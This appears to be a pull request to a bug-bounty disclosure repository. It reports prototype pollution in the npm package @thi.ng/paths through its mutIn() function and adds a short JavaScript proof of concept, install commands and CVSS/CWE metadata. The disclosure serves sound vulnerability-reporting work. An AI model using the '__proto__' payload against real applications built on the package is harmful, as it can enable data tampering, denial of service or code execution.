### PR TITLE
Prototype Pollution in @thi.ng/paths

### DIFF
--- a/bounties/npm/@thi.ng/paths/1/README.md
+++ b/bounties/npm/@thi.ng/paths/1/README.md
@@ -1,0 +1,30 @@
+# Description
+
+`@thi.ng/paths` is vulnerable to `Prototype Pollution`. The vulnerability is due to an incomplete fix. `mutIn()` function does not have fix implemented.
+
+# Proof of Concept
+
+1. Create the following PoC file:
+```javascript
+// poc.js
+const paths = require('@thi.ng/paths')
+
+console.log(`Before: ${{}.polluted}`)
+paths.mutIn({}, '__proto__.polluted', true)
+console.log(`After: ${{}.polluted}`)
+```
+2. Execute the following commands in the terminal:
+```bash
+npm i @thi.ng/paths # install vulnerable package
+node poc.js # run the PoC
+```
+3. Check the output:
+```
+Before: undefined
+After: true
+```
+
+# Impact
+
+`Prototype Pollution` leads to Information Disclosure/DoS/RCE.
+

--- a/bounties/npm/@thi.ng/paths/1/vulnerability.json
+++ b/bounties/npm/@thi.ng/paths/1/vulnerability.json
@@ -1,6 +1,6 @@
 {
     "PackageVulnerabilityID": "1",
-    "DisclosureDate": "2020-12-27",
+    "DisclosureDate": "2021-01-13",
     "AffectedVersionRange": "*",
     "Summary": "Prototype Pollution",
     "Contributor": {

--- a/bounties/npm/@thi.ng/paths/1/vulnerability.json
+++ b/bounties/npm/@thi.ng/paths/1/vulnerability.json
@@ -1,0 +1,59 @@
+{
+    "PackageVulnerabilityID": "1",
+    "DisclosureDate": "2020-12-27",
+    "AffectedVersionRange": "*",
+    "Summary": "Prototype Pollution",
+    "Contributor": {
+        "Discloser": "arjunshibu",
+        "Fixer": ""
+    },
+    "Package": {
+        "Registry": "npm",
+        "Name": "@thi.ng/paths",
+        "URL": "https://www.npmjs.com/package/@thi.ng/paths",
+        "Downloads": "803"
+    },
+    "CWEs": [
+        {
+            "ID": "471",
+            "Description": "Modification of Assumed-Immutable Data (MAID)"
+        }
+    ],
+    "CVSS": {
+        "Version": "3.1",
+        "AV": "N",
+        "AC": "L",
+        "PR": "N",
+        "UI": "N",
+        "S": "U",
+        "C": "L",
+        "I": "L",
+        "A": "L",
+        "E": "",
+        "RL": "",
+        "RC": "",
+        "Score": "5.6"
+    },
+    "CVEs": [
+        ""
+    ],
+    "Repository": {
+        "URL": "https://github.com/thi-ng/umbrella",
+        "Codebase": [
+            "TypeScript"
+        ],
+        "Owner": "thi-ng",
+        "Name": "umbrella",
+        "Forks": "74",
+        "Stars": "1700"
+    },
+    "Permalinks": [
+        ""
+    ],
+    "References": [
+        {
+            "Description": "",
+            "URL": ""
+        }
+    ]
+}


### PR DESCRIPTION
# Description

`@thi.ng/paths` is vulnerable to `Prototype Pollution`. The vulnerability is due to an incomplete fix. `mutIn()` function does not have fix implemented.

# Proof of Concept

1. Create the following PoC file:
```javascript
// poc.js
const paths = require('@thi.ng/paths')

console.log(`Before: ${{}.polluted}`)
paths.mutIn({}, '__proto__.polluted', true)
console.log(`After: ${{}.polluted}`)
```
2. Execute the following commands in the terminal:
```bash
npm i @thi.ng/paths # install vulnerable package
node poc.js # run the PoC
```
3. Check the output:
```
Before: undefined
After: true
```

# Impact

`Prototype Pollution` leads to Information Disclosure/DoS/RCE.

## :white_check_mark: Checklist

* [x]  _Created and populated the `README.md` and `vulnerability.json` files_

* [x]  _Provided the repository URL and any applicable permalinks_

* [x]  _Defined all the applicable weaknesses (CWEs)_

* [x]  _Proposed the CVSS vector items i.e. User Interaction, Attack Complexity_

* [x]  _Checked that the vulnerability affects the latest version of the package released_

* [x]  _Checked that a fix does not currently exist that remediates this vulnerability_

* [x]  _Complied with all applicable laws_